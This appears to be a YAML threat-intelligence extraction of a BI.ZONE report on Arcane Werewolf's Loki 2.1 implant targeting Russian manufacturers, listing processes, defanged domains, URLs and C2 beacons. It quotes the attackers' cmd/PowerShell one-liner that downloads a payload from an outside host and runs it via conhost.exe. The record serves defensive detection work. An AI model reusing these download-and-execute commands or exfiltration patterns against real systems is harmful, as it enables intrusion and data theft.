# Failed YAML extraction
# Timestamp: 2026-05-01T20:41:52.235966
# Response length: 2873 chars
# Input chunk preview: '=== ARTICLE BODY ===Arcane Werewolf revamps its arsenal with Loki 2.1 implantIn October and November 2025, BI.ZONE Threat Intelligence observed malicious activity by Arcane Werewolf (Mythic Likho) tar'
# ============================================================

title: "Arcane Werewolf revamps its arsenal with Loki 2.1 implant"
description: Arcane Werewolf (Mythic Likho) targeted Russian manufacturing enterprises using phishing emails to distribute malicious LNK files, which led to the deployment of a new Loki 2.1 implant.
attribution: "Arcane Werewolf (Mythic Likho)"
malware_families:
  - Loki
cves: []
ttps:
  processes:
    - cmd.exe
    - conhost.exe
    - csrss64.exe
  command_lines:
    - cmd.exe /v:on /c "set u=hxxps://192.168.1[.]1/m2.png && set u=!u:192.168.1[.]1=f.npo-[redacted][.]ru! && powershell -c \"$ProgressPreference='SilentlyContinue' ;iwr -Uri $env:u -OutFile $env:TEMP\icon2.png;conhost.exe $env:TEMP\icon2.png\""
    - cmd.exe /C conhost.exe %TEMP%\chrome_proxy.pdf
    - cmd.exe /C start "" %TEMP%\7784_ot09.2025.pdf
    - cmd.exe /C start C:\Users\Public\Documents\._7028-69__05.11.2025____.pdf(Ref. 7028-69 dated 2025-11-05, Reg. internal investigation)
    - cmd.exe /C start C:\Windows\Temp\csrss64.exe
  powershell:
    - "$ProgressPreference='SilentlyContinue' ;iwr -Uri $env:u -OutFile $env:TEMP\icon2.png;conhost.exe $env:TEMP\icon2.png"
  scripts: []
  registry_keys: []
  image_loads:
    - icon2.png
    - chrome_proxy.pdf
    - csrss64.exe
  network_connections:
    - cmd.exe -> hxxps://f.npo-[redacted][.]ru/m2.png:80
    - conhost.exe -> hxxps://docs.npo-[redacted][.]ru/data?q=[base64_enc_data]:80
    - csrss64.exe -> hxxps://cdn.electropriborzavod[.]ru/index?data=[base64_enc_data]:80
  file_activity:
    - C:\Users\qwerty\Desktop\NEW_SKLEIKA\ready_payloads\mass_1310
    - %TEMP%\icon2.png
    - %TEMP%\chrome_proxy.pdf
    - %TEMP%\7784_ot09.2025.pdf(Ref. 7028-69 dated 2025-10-10 from [organization])
    - C:\Users\Public\Documents\._7028-69__05.11.2025____.pdf(Ref. 7028-69 dated 2025-11-05, Reg. internal investigation)
    - C:\Windows\Temp\csrss64.exe
  persistence: []
  process_relations:
    - cmd.exe -> conhost.exe
    - cmd.exe -> csrss64.exe
iocs:
  hashes: []
  ip_addresses:
    - 192.168.1[.]1
  domains:
    - disk.npo-[redacted][.]ru
    - files.npo-[redacted][.]ru
    - f.npo-[redacted][.]ru
    - docs.npo-[redacted][.]ru
    - cloud.electropriborzavod[.]ru
    - cdn.electropriborzavod[.]ru
  urls:
    - hxxps://disk.npo-[redacted][.]ru/files/1a427fba.zip
    - hxxps://files.npo-[redacted][.]ru/direct/7b44646d-1b09-45b1-8977-62327e6ec1e7/1a427fba/%D0%98%D1%81%D1%85%D0%BE%D0%B4%D1%8F%D1%89%D0%B5%D0%B5%20%E2%84%96%207784%20%D0%BE%D1%82%2010.10.2025%20%D0%BE%D1%82%20%D0%90%D0%9E%20_%D0%9D%D0%9F%D0%9F%20_%D0%97%D0%B0%D0%B2%D0%BE%D0%B4%20%D0%98%D1%81%D0%BA%D1%80%D0%B0_.zip
    - hxxps://f.npo-[redacted][.]ru/m2.png
    - hxxps://docs.npo-[redacted][.]ru/data?q=[base64_enc_data]
    - hxxps://cloud.electropriborzavod[.]ru/files/d8287185e4ae695a
    - hxxps://cdn.electropriborzavod[.]ru/index?data=[base64_enc_data]
authors:
  - BI.ZONE Threat Intelligence